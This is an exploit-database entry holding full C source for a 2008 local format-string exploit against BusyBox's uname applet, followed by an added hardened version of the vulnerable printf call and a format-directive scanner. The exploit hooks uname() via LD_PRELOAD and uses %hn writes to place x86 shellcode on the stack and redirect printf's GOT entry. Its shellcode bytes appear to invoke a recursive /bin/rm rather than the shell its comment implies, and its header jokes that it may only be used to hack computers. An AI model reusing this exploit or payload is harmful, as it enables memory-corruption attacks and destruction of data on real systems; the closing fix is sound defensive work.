BusyBox (uname) Local Format String Exploit

Reported by RootType on 01 Jul 2008 00:00:00. Source: seebug (www.seebug.org)

Local format string exploit for the BusyBox `uname` applet, which passes a field of `struct utsname` directly to `printf()` as the format string. The exploit is built as a shared library that replaces `uname(2)` via `LD_PRELOAD` and fills the `sysname` field with a format string; the string writes shellcode onto the stack with `%hn` writes and then overwrites the `printf` GOT entry to point at it. As the author notes, it must be run with uid 0 to obtain uid 0. The header also carries the author's joke terms of usage and a greets section.

Code

/* 
 * lul-busybox.c copyright (C) 2008 lul-disclosure inc. All rights reserved.
 * this code is distributed with the LPL license agreement http://lul-disclosure.net/LPL.txt 
 * moar commonly known as the EULA (Epic User License Agreement)
 *
 * busybox uname format string exploit
 * by towlie 
 *
 * ADVANCED CREDITS:
 * 
 * bug found by my irclog of andrewg pasting advanced vulnerability details into #social irc channel.
 * TESO - For describing write primitive technology to write the shellcode to the stack. 
 *
 * ADVANCED DISCREDITS:
 *
 * n0ah/k-special:
 * for determining he invented the super
 * advanced technology used in this exploit to write payload to the stack with a write4()
 *
 * ADVANCED VULNERABILITY DETAILS:
 * 
 * busybox-version/uname.c:92:
 * 	printf(((char *)(&uname_info)) + *delta); // LOL 2002AD CODING TECHNOLOGY 
 * 
 * ADVANCED USAGE ON HOW TO USE THIS SUPER ADVANCED PIECE OF TECHNOLOGY:
 * 
 * compile as a shared lib:
 * 	cc -fPIC -c lul-busybox.c -o busybox.o
 * 	cc -shared -o busybox.so busybox.o
 *
 * EXAMPLE USAGE OF SUPER ADVANCED EXPLOIT TECHNOLOGY
 *
 * $ export LD_PRELOAD="./busybox.so"
 * $ ./busybox_unstriped uname -a
 * AAûÿ¿pûÿ¿vûÿ¿zûÿ¿ûÿ¿tûÿ¿xûÿ¿|ûÿ¿ûÿ¿~ûÿ¿rûÿ¿²ûÿ¿°
 * 				3221224326    
 * 			...
 * sh-3.2#
 *
 * ADVANCED EXPLOITATION NOTE:
 * run this advanced piece of technology with the user privileges of uid 0 to obtain uid 0
 *
 * ADVANCED TERMS OF USAGE:
 * THIS PIECE OF ADVANCED TECHNOLOGY MAY ONLY BE USED TO HACK COMPUTERS.
 * BREAKING THE TERMS WILL RESULT IN ME PUNCHING YOUR FACE.
 *
 * ADVANCED GREETS SECTION:
 * orbital for walking me through 90% of this exploit since i am fail LOLOL!
 * jupiter for making the standard exploit header footer and LPL.
 * Bruce Lee for being awesome.
 * blaqjesus for continued lulz brother of Jesus H. Christ.
 * people who are in it for the lulz.
 * 
 */

#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>

#define OVERWRITE_ADDR	0x080e25b0	/* printf GOT address (target of the last two %hn writes) */
#define SHELLCODE_ADDR	0xbffffb70 	/* stack address the shellcode is written to */
#define PADDING_LEN 	2		/* alignment bytes placed before the address list */
#define FMT_LEN		((sizeof(sc) / 2) + 2)	/* one 16-bit write per shellcode word, plus two for the GOT entry */

char sc[] =
  // This shellcode works better
  "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89"
  "\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68"
  "\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80";

 /* 
  "\x6a\x0b"                  // push   $0xb
  "\x58"                        // pop    %eax
  "\x99"                        // cltd
  "\x52"                        // push   %edx
  "\x68\x2f\x2f\x73\x68"        // push   $0x68732f2f
  "\x68\x2f\x62\x69\x6e"        // push   $0x6e69622f
  "\x89\xe3"                    // mov    %esp, %ebx
  "\x52"                        // push   %edx
  "\x53"                        // push   %ebx
  "\x89\xe1"                    // mov    %esp, %ecx
  "\xcd\x80";                   // int    $0x80
 */

char *put_addr(char *p, unsigned int addr);
char *build_fmt(char *p);

/*
 * LD_PRELOAD replacement for uname(2): instead of kernel data, the sysname
 * field (and the fields that follow it in struct utsname) receive the format
 * string built below, which the BusyBox applet then hands straight to printf().
 */
int uname(struct utsname *buf)
{
	char *ptr;

	ptr = (char *) &buf->sysname;
	build_fmt(ptr);

	return 0;
}

/* append addr to the buffer as four little-endian bytes, return the advanced pointer */
char *put_addr(char *p, unsigned int addr)
{
	*p++ = (addr & 0x000000ff);
	*p++ = (addr & 0x0000ff00) >> 8;
	*p++ = (addr & 0x00ff0000) >> 16;
	*p++ = (addr & 0xff000000) >> 24;

	return p;
}

char *build_fmt(char *p)
{
	/* one entry per 16-bit write: the value to store and the address to store it at */
	struct shellcode_short {
		unsigned short value;
		unsigned long addr;
	} shellcode[FMT_LEN], temp;

	unsigned short *ptr;
	unsigned long start;
	int i, o, written;

	/* split the shellcode into 16-bit words destined for consecutive stack addresses */
	start = SHELLCODE_ADDR;
	ptr = (unsigned short *) sc;
	for(i=0;i<FMT_LEN-2;i++, start+=2, ptr++) {
		shellcode[i].value = *ptr;
		shellcode[i].addr = start;
	}

	/* the final two writes point printf's GOT entry at the shellcode, low half then high half */
	shellcode[FMT_LEN-2].addr  = OVERWRITE_ADDR;
	shellcode[FMT_LEN-2].value = (SHELLCODE_ADDR & 0x0000ffff);

	shellcode[FMT_LEN-1].addr  = OVERWRITE_ADDR + 2;
	shellcode[FMT_LEN-1].value = (SHELLCODE_ADDR & 0xffff0000) >> 16;

	/* bubble sort by value, ascending, so the running output count only ever has to grow */
	for(o=0;o<((FMT_LEN)-1);o++) {
		for(i=0;i<((FMT_LEN)-1-o);i++) {
			if(shellcode[i+1].value < shellcode[i].value) {
				temp.addr  = shellcode[i].addr;
				temp.value = shellcode[i].value;

				shellcode[i].addr  = shellcode[i+1].addr;
				shellcode[i].value = shellcode[i+1].value;

				shellcode[i+1].addr  = temp.addr;
				shellcode[i+1].value = temp.value;
			}
		}
	}

	/* alignment padding, then the address list the %N$ specifiers below refer to */
	for(i=0;i<PADDING_LEN;i++)
		*p++ = '\x41';

	for(i=0;i<FMT_LEN;i++)
		p = put_addr(p, shellcode[i].addr);

	/* one "%N$<width>u%N$hn" pair per entry: the width pads the output count up to
	 * the wanted value, then %hn stores that count at the address in argument N */
	written = (FMT_LEN)*4 + PADDING_LEN;
	for(i=0;i<FMT_LEN;i++) {
		p += sprintf(p, "%%%d$%uu%%%d$hn", i + 2,
					shellcode[i].value - written, i + 2);
		written = shellcode[i].value;
	}

	return p;
}
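The hardened counterpart of the vulnerable `printf(((char *)(&uname_info)) + *delta)` call, as an added example that is neither BusyBox's code nor part of the original exploit: the struct is still walked by byte offset, but the field is passed as a bounded `%s` argument so any embedded conversions print literally, and a small scanner counts directives in a field as a sanity check on its origin. It assumes glibc's `struct utsname` layout (65-byte members); `render_field`, `count_format_directives`, `demo` and the constructed `HOSTILE_SYSNAME` sample are names chosen here.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>

/* The applet's vulnerable call was, in effect:
 *     printf(((char *)&uname_info) + delta);   // the field bytes ARE the format
 * This hardened form keeps the same offset walk but passes the field as a
 * bounded "%s" argument, so '%' sequences inside it are emitted unchanged.
 * Returns the number of characters snprintf produced. */
int render_field(char *out, size_t outlen, const struct utsname *u, size_t delta)
{
    const char *field = (const char *)u + delta;
    /* precision caps the read at the member size even if it lacks a NUL */
    return snprintf(out, outlen, "%.*s", (int)sizeof u->sysname, field);
}

/* Counts printf conversions in s, i.e. every '%' not escaped as "%%".
 * Kernel-supplied utsname data never contains one; a nonzero count means the
 * field came from somewhere else (such as an LD_PRELOAD replacement of uname). */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* literal percent: skip the pair */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

/* Constructed sample: the kind of directive chain the exploit's hooked uname()
 * leaves in sysname, without the raw address bytes (assumption, not real output). */
static const char HOSTILE_SYSNAME[] = "AA%2$65535u%2$hn%3$12u%3$hn";

/* Fills a utsname with the hostile field and renders it through the safe path. */
int demo(char *out, size_t outlen)
{
    struct utsname u;
    memset(&u, 0, sizeof u);
    strncpy(u.sysname, HOSTILE_SYSNAME, sizeof u.sysname - 1);
    return render_field(out, outlen, &u, offsetof(struct utsname, sysname));
}
```

Rendering the hostile field returns exactly its bytes and length, which is the property the fix needs: the data can no longer steer `printf`.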
